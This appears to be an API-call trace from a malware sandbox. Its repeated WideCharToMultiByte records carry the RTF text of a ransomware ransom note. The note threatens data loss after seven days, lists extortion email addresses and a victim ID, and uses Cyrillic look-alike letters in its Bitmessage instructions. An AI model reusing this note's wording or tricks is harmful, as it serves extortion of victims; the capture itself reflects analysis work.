;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.474] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.474] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24657d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 